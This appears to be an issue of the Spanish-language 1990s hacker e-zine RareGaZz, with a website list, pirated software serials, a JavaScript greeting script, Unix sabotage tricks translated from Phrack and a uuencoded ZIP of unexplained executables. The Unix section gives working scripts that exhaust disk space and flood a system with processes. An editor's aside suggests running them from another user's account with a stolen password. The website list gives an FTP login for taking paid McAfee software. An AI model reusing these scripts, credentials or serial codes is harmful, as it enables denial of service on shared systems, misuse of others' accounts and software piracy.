Phil Zimmerman es un paranoico, esquizofrenico y hasta un poco zafado del
craneo que ha intentado dar privacidad a cualquier persona que la necesite
y por eso ha creado PGP y ahora PGPFone.
Si PGP no lo mete en la carcel, seguramente PGPFone lo hara!

No he investigado mucho sobre PGPFone pero se que la encripcion utilizada en
el programa es bastante fuerte y probablemente 'inquebrable'. Asi que, ya lo
saben, si tienen conversaciones cochinas por telefono como Marcela y un
politico mexicano mejor proteganse con encripcion...y aseguren su privacidad.

Disponible en:

http://web.mit.edu/network/pgpfone/


0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

<=><=><=><=><=><=><=><=><=>
<=> Los 10 <=>
<=> Mejores Websites <=>
<=> ~~~~~~~~~~~~~~~~ <=>
<=><=><=><=><=><=><=><=><=>

Texto original escrito por 'RareTrip' para RareGaZz

"El experto es aquel que sabe mas y mas sobre menos
y menos hasta que sabe absolutamento todo acerca
de nada." Leyes de Murphy

______________________________________________________________________________
Website Http:// Servicios Ofrecidos Gratuitamente
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mercury Mail www.merc.com Whoa! Este website se merece 5 estrellas,
ofrece noticias sobre cualquier TOPICO de
interes desde deportes hasta lo mas
actualizado en noticias de Latinoamerica. Es
todo un WebSite de Noticias via e-mail, lo
unico que tienes que hacer es visitar el
website y seleccionar que temas deseas que
llegen a tu buzon cada semana. Puedes
seleccionar ediciones de distintas partes del
planeta y hasta noticias sobre el estado del
tiempo del lugar donde vives. Solo una
recomendacion: No te subscribas a cosas que no
necesitaras ya que solo atascaran tu buzon de
correo, lo ideal es subscribirte a los
siguientes reportes: U.S. Front Page Stories,
World Front Page Stories, The Americas
(latinoamerica) y si te gustan los deportes
puedes seleccionar sobre NBA, SKI, etc.

CNET www.cnet.com Aqui encontraras informacion sobre los nuevos
servicios en Internet. Ademas puedes
subscribirte a la lista de correo que cada mes
te manda a tu buzon de correo lo nuevo y una
comica lista 'TOP TEN'. Para subscribirte a
esta lista de correo manda un mensaje a
DISPATCH@CNET.COM con la siguiente linea de
texto en el mensaje:
subscribe [tu direccion e-mail]
ejemplo: subscribe midir@email.net

SHAREWARE www.shareware.com Es un Website de CNET que contiene casi todos
los programas shareware que hay en la red.
Esta equipado con una conveniente maquina de
busqueda de palabras claves. Si quieres estar
enterado de lo mas nuevo en Shareware puedes
subscribirte a la lista de correo recibiras en
tu buzon una lista con el software mas
reciente asi como una lista de los 10
programas mas populares. Para subscribirte
manda un mensaje a sw-dispatch@shareware.com
con la siguiente linea de texto en el mensaje:
subscribe shareware-dispatch [tu dir e-mail]
ej. subscribe shareware-dispatch midir@email.net

Who Where? www.spanish.whowhere.com
www.whowhere.com Este website funciona como un libro de
direcciones e-mail de Internet. Si buscas la
direccion e-mail de alguna persona solo
escribe su nombre en la maquina de busqueda y
si esta registrada aparecera su direccion e-
mail, su nombre, intereses y hasta su frase
favorita. Si deseas colaborar con esta labor
solo apunta tu visualizador a
www.spanish.whowhere.com y solicita
inscribirte en el directorio. Si no eres de
los que les gusta dar su direccion e-mail
por temor a ataques existe una opcion que te
permite 'esconder' tu direccion y solo
aparecera un Link para mandarte correo en
lugar de tu direccion.

Hotmail www.hotmail.com Este es un servidor que te permite crear una
cuenta de correo anonima basada en HTML. Si
deseas dar a conocer una direccion sin que
alguien pueda saber tu verdadera identidad
aqui es donde perteneces! Para ver tu correo
solo debes de escribir un Login y tu Password.
Para crear una cuenta selecciona un Link en la
pagina principal llamado 'SIGN UP' y tomate el
tiempo en llenar los campos de informacion que
piden. Este es un buen servicio pero con que
fin? Pues el de hacer una auditoria en el
web, ya que cada subscriptor debe llenar los
campos sobre su ingreso anual y su edad
etcetera. No recomendamos poner datos
verdaderos ni mucho menos tu nombre completo,
un nombre ficticio y datos al hazar no le
da¤an la conciencia a nadie :) Por favor no te
pongas a crear mas de 2 cuentas pues hay gente
interesada en este servicio que queda fuera
debido a falta de espacio!

BIGFOOT www.bigfoot.com Este es un servicio de Re-mailer que te
permite crear una direccion 'Virtual' de
correo electronico solo que es indispensable
que ya tengas una cuenta legitima. Es util si
en tu casa diferentes personas comparten una
misma direccion e-mail, puedes unirte a
'Bigfoot for Life' y escribir el nombre de tu
direccion virtual con nombre de dominio
@bigfoot.com Cualquier mensaje mandado a una
cuenta bigfoot es mandado a tu cuenta de
correo legitima. Por ejemplo si en una familia
todos desean su direccion e-mail propia
podrian crear: HIJO@BIGFOOT.COM
MAMA@BIGFOOT.COM
PAPA@BIGFOOT.COM
Y cada quien daria su direccion a sus
amistades, de cualquier manera los mensajes
van a parar a la misma cuenta de email.

Proceso http://proceso.web.com.mx/
Te recomendamos visites su sitio para ver los
articulos que aparecen en el numero actual y
en el anterior. Encontraras los articulos
divididos en las secciones de: Reportajes,
Nacional, Analisis, Internacional, Cultura y
Deportes.

Geocities www.geocities.com Si sabes programar HTML y tienes un poco de
sentido comun en este Website podras colocar
tu HomePage absolutamente gratis. Cada
'ciudadano' de Geocities es propietario de un
megabyte de espacio para su pagina, si
acumulas puntos en sus diversos planes puedes
aumentar el espacio disponible. Ademas te dan
la oportunidad de crear una cuenta de e-mail
para usarla en tu pagina. Puedes usarla como
una direccion legitima accesible desde
cualquier programa de e-mail o puedes
especificar que sea mandada a otra direccion y
actue como re-mailer.

Wired www.wired.com Todo lo Hype sobre Internet en este website de
una revista no-electronica que trata sobre la
cultura en Internet, algunos denominan a esta
revista el 'Internet impreso'. Podras
subscribirte a varias listas de correo sobre
distintos temas. Algunos nombres de dominio
tambien de esta revista son: www.webmonkey.com
y la maquina de busqueda www.hotbot.com

Cruel www.cruel.com Si te gustan los rollos filosoficos y el humor
negro visita esta Website y encontraras un
Link distinto cada dia a una pagina cruel. Si
deseas visitar los links de dias pasados
visita 'our cruel heritage' y selecciona el
mes que quieras examinar.

McAfee www.mcafee.com Aqui podras bajar el popular programa SCAN de
McAfee que es actualizado cada mes. Para bajar
las actualizaciones solamente dirigete a:
www.mcafee.com/down/dat.html
Si deseas comprar la version registrada de
VirusScan puedes hacerlo en este WebSite, pero
si eres un tipico lector de RareGaZz desearas
usar tecnicas de Hackers para obtenerlo...Pues
bien, aqui esta el link para que puedas
acceder al programa registrado sin tener que
pagar ni un solo centavo:

ftp://licensed:321@ftp.mcafee.com/licensed/antivirus/
(Exclusiva de RareGaZz)

No sabemos por cuanto tiempo mas podras hacer
este Hack pero por lo pronto los editores y
colaboradores de esta revista ya lo tenemos y
esta Super!

F-Prot www.datafellows.com Aqui puedes ver los diferentes productos que
tiene esta compa¤ia dedicada a los antivirus y
seguridad informatica. Para ir al lugar donde
puedes bajar la version mas actual de F-Prot
he aqui el URL para el navegador:
ftp://ftp.Datafellows.com/f-prot/free/
______________________________________________________________________________
rArEtRiP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ok! Fueron mas de 10 y esta revista no es de $#@% Links, pero en verdad que
estos son muy buenos lugares y no podiamos dejar de informarles sobre los
servicios que ofrecen. Sigan en contacto pues en uno de los siguientes numeros
incluiremos una pagina HTML repleta de Links para que la veas en tu Navegador
favorito!

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

CODIGOS DE REGISTRO

Ok, estos codigos no son de programas muy conocidos pero de cualquier manera
alguien podria necesitar uno de estos numeritos... Los mas importantes de
este numero son los cracks para TRUMPWSK 2.1F, Webauthor v1.0, entre otros.

=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

-=| El CrAcK ganador de este numero |=-
Microangelo Version 2.1
Name: RareGaZz
#: S4795050

Microangelo 2.1
Este programa 'shareware' permite manipular iconos de una manera facil y
ademas permite crear cursores animados (ANI) e iconos de 256 colores!
Disponible en: http://www.impactsoft.com
^^^^^^^^^^^^^^^^^^^^^^^^^
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

The international OCR - A46IW331561710
The LastByte Memory Manager v2.50 The GuaRDiaN aNGeL CF5AD7D9
The mayor BBS v6.25 - NWGEEGD9J
The reader v4.01 Batman AAAAAJ
The reader v4.01 : name/Mine key/AAAB
The semware editor prerelease - 3001005027
The Troubleshooter v3.51 - 570166
Thedraw v4.62 : A460-004945
Thumbs plus...........name: MicroStar............user code:E87524F5
Thumbsplus 2.0c : name/Kermu! #/7141f9d5
Timbuktu v1.01 Remote : 3120741165
Timbuktu v1.1 for DOS and Windows : 3130078-33EC
Timbuktu v3.1 : 067-591-117-475
Time Organizer 2.0 : TMO-A011043-45
Time slips v5.0 for Windows : 5.10190000638
TKterm v0.15 Batman 276MH60
TKterm v0.15 : name/Me #/GCII233
Toolbook v3.0 : 0740-002321
Topproducer v5.0 for Windows : IS3H-081794-CAE0019264
Total access analyzer 2.02c /MSAccess : ST66162722
Total access speller 1 user /MSAccess : ST42204733
Total access statistics 1.0a /MSAccess: ST77008244
Totally twisted screensaver for Win : BII-00670-6681
Tradewars 2002 v2.0 Batman FB\\D8IP\\EI
Tradewars 2002 v2.0 : name/Me #/M4FE\C^JDH
Transcan v5.0 7e-08a7-81
Treboffer v1.0 : #/622 pw/Password
Trip Maker Road Atlas /win tmd 100 100 10782
Tron v1.06 The GuaRDiaN aNGeLST+44723
Tron v1.06 : name/Me! #/ST+44147
Troubleshooter v3.51 : 570166
True Forms 2.0 : TDA2008000217
True type effects : TEW31-13A2B-01F0KV
Truespace - 310015032904
Truespace 2.0 - 310001025247
Truespace animation v1.0 for Windows : 310001026188
Truespace animation v1.0 for Windows - 3 10 001 027601
Truespace animation v1.0 for Windows 310001026188.310001027601
Truespace Special Edition 1.0 for Win3,95&NT<td>3 10 001 101852
Truespace v2.0 : 3 20 004 0030567
Trumpet winsock 2.1f...............Name: james bond......reg # 24551570
Turbocom/2 v2.0 : 102454202
Turbofast professional v4.2d : 23-HH845
Turbofast professional v4.2d...................23-HH971
Twinbridge v3.3 for Windows : TBCWSYS9409U-109307
Typestry v1.1 for Windows : 478821383
Typestry v1.1 for Windows...........................4144650235
UHS Reader v3.0 : name/Me! #/177371
UHS Reader v3.0The GuaRDiaN aNGeL858562
UHS TSR v1.0 : name/Me! #/411321722622
UHS TSR v1.0 .............name: The GuaRDiaN aNGeL.....s/n: 213641341431
Ultra compressor II archiver, r2-3 PRO: #/2650819804 code/2423
Ultra Edit 32 bit v3.0 THE RIDDLER [EOD]93238625
Ultra Paint : 51736
Uninstaller /win i2237533 i20095616
Uninstaller v3.0 for Windows : VE18530027716
Uninstaller v3.0 for Windows : VE18530027716
Unprotect/DOS 4.2a v646 : name/GaRY D. [UCF] #/00000000138
Upcheck v6.0 : name/Me bbs/XXX #/CMX2330 reg/O541148315876MSEB
Uper queue v3.1 for Windows798-310-00120
Usurper : name/Me bbs/XXX #/541315
Usurper ..................name: Batman.......bbs: Gotham.......s/n: 2602834
Value vision personal inv. mgr v2.0 : VV-W20-2551554
VCL (Virus Construction Lab) - Chiba City
Ventura publisher NL v3.0 : RWNL000029
Versions/VB v1.1 for Windows : 110020000897
VESAVIEW V6.X THE RIDDLER [EOD]rUDF7M7QM
VFast v2.0 beta protocol driver : VFC0D6F2
Virtus Virtual Walkthrough : AWCAA241-000-03F0
Virtus VR : I20095616
Virtus VR /win gwcaa405-000-2aac
Virtus VRI20095616
Vis PRO C/C++ for OS/2 : VPP5015436 or VPP6019281
Vis PRO rexx gold edition for OS/2 : VPR1540827
Visio 3 : 117-287-033446
Visual reality for Windows : VRW02449
Visualage team v2.0 for Windows : 17H7503
Voice type control v2.0 for Windows : 16H9-740
Vueprint v4.0 for Windows : 9202446
Vueprint v4.0 for Windows....9202444....16731549.....10596830....10596831
VuePrint v4.1 : 9202444
VuePro 32 : 8342813
VX Rexx v2.0 for OS/2 : VXR2025401
Walt Disney screensaver for Windows....DSW-30857-2768.....DSW-36523-5758
Watcom SQL netware NLM for Windows : 31600455
Webauthor v1.0 for MS Word v6.0 /Win : 000-17N-22546


0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

JavaScript
~~~~~~~~~~
En este numero presentaremos un codigo javascript que permite dar una
bienvenida a nuestra pagina de acuerdo a la hora. Si el usuario entra a
nuestra pagina a las 12:00pm aparece 'BUENOS DIAS', si llega a las 5:00pm
'BUENAS TARDES' y asi...

El codigo debera ser colocado despues de la etiqueta <BODY> de la pagina.

__________________________________Comienza CODIGO HTML________________________

<SCRIPT LANGUAGE="JavaScript">

function greeting()

{

var today = new Date();

var hrs = today.getHours();

document.writeln("<CENTER>");

if ((hrs >=6) && (hrs <=18))

{

}

else

document.writeln("<BR>");

document.write("<H1>");

if (hrs < 6)

document.write("Buenos Dias");

else if (hrs < 12)


document.write("Buenos Dias");

else if (hrs <= 18)

document.write("Buenas Tardes");

else

document.write("Buenas Noches");


document.writeln("!</H1>");

document.write("Bienvenido, son las ");

dayStr = today.toLocaleString();

i = dayStr.indexOf(' ');

n = dayStr.length;

document.write(dayStr.substring(i+1, n));

document.writeln("</CENTER>");

}

document.write(greeting());


</SCRIPT>
__________________________________Termina CODIGO HTML_________________________


0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

=Trucos para Unix por Shooting Shark=
Texto original de Phrack #6

Sumario: Metodos de sabotage para usarlos en tu sistema UNIX favorito.


Crash The System
----------------
Unix no tiene forma de regular el espacio en disco permitido a cada usuario.
Por esto, casi cualquier usuario puede obtener todo el espacio en disco en el
sistema y efectivamente prevenir que cualquier otro usuario escriba en el
disco. Una simple forma de obtener todo el espacio en el disco es crear un
subdirectorio despues de un subdirectorio hasta que no haya espacio para otro
subdirectorio mas. Aqui hay algunas formas de hacerlo.

1> Crea un archivo con las siguientes lineas:

mkdir subdir
cd subdir
source /u1/mydir/crash

Llamalo crash. La ultima linea ("source /u1/mydir/crash") debe de estar
alterada para que busque el archivo en tu directorio. Si tu directorio
es /home/usuarios/nombre, la ultima linea debera decir "source
/home/usuarios/nombre/crash". Despues de grabar el archivo escribe:

(% Simboliza el prompt. En tu sistema puede ser: #, $, *, etc.)

% source crash

y espera...dentro de unos minutos el programa abortara por que no tendra
espacio suficiente en el disco. Tampoco cualquier otro.

2> Si deseas dejar el proceso y colgar (Log off) y el archivo es llamado
crash, escribe:

% nohup source crash &

Este comando empezara el proceso en el Background permitiendote que tu
termines la sesion (LOG OFF).

Haciendo mas lento el sistema
-----------------------------
Hay muchas formas de lograr esto, un ejemplo especifico es crear muchos
procesos en el background. Para hacer esto crea un archivo llamado "slow1"
con las siguientes lineas:

w &
source slow1

Crea un archivo llamado "slow2" con:

source slow1 &
source slow2

Y ejecuta slow2 con:

% slow2 &

Esto creara 25 procesos en el background, cada uno ejecutando 25 procesos mas.
El sistema terminara por inmovilizarse.

[Editor: Para evitar que seas sorprendido, usa estos trucos en la cuenta y
directorio de otra persona. Solo necesitas su Login y Password ;-)]

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=


=SECCION DE SOFTWARE=

En este numero se incluye el archivo UTILS.ZIP que contiene los archivos
CIPHER.COM, HEDIT.EXE y WYPE.COM
Para crear el archivo UTILS.ZIP copia el texto entre los puntos (sin los
puntos) y copialo a un archivo con el nombre UTILS.UUE y usa el programa
UUDECODE (incluido en RareGaZz #1) con la siguiente SINTAXIS:

UUDECODE UTILS.UUE
{Principio de UTILS.UUE}
..............................................................................
begin 644 utils.zip
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
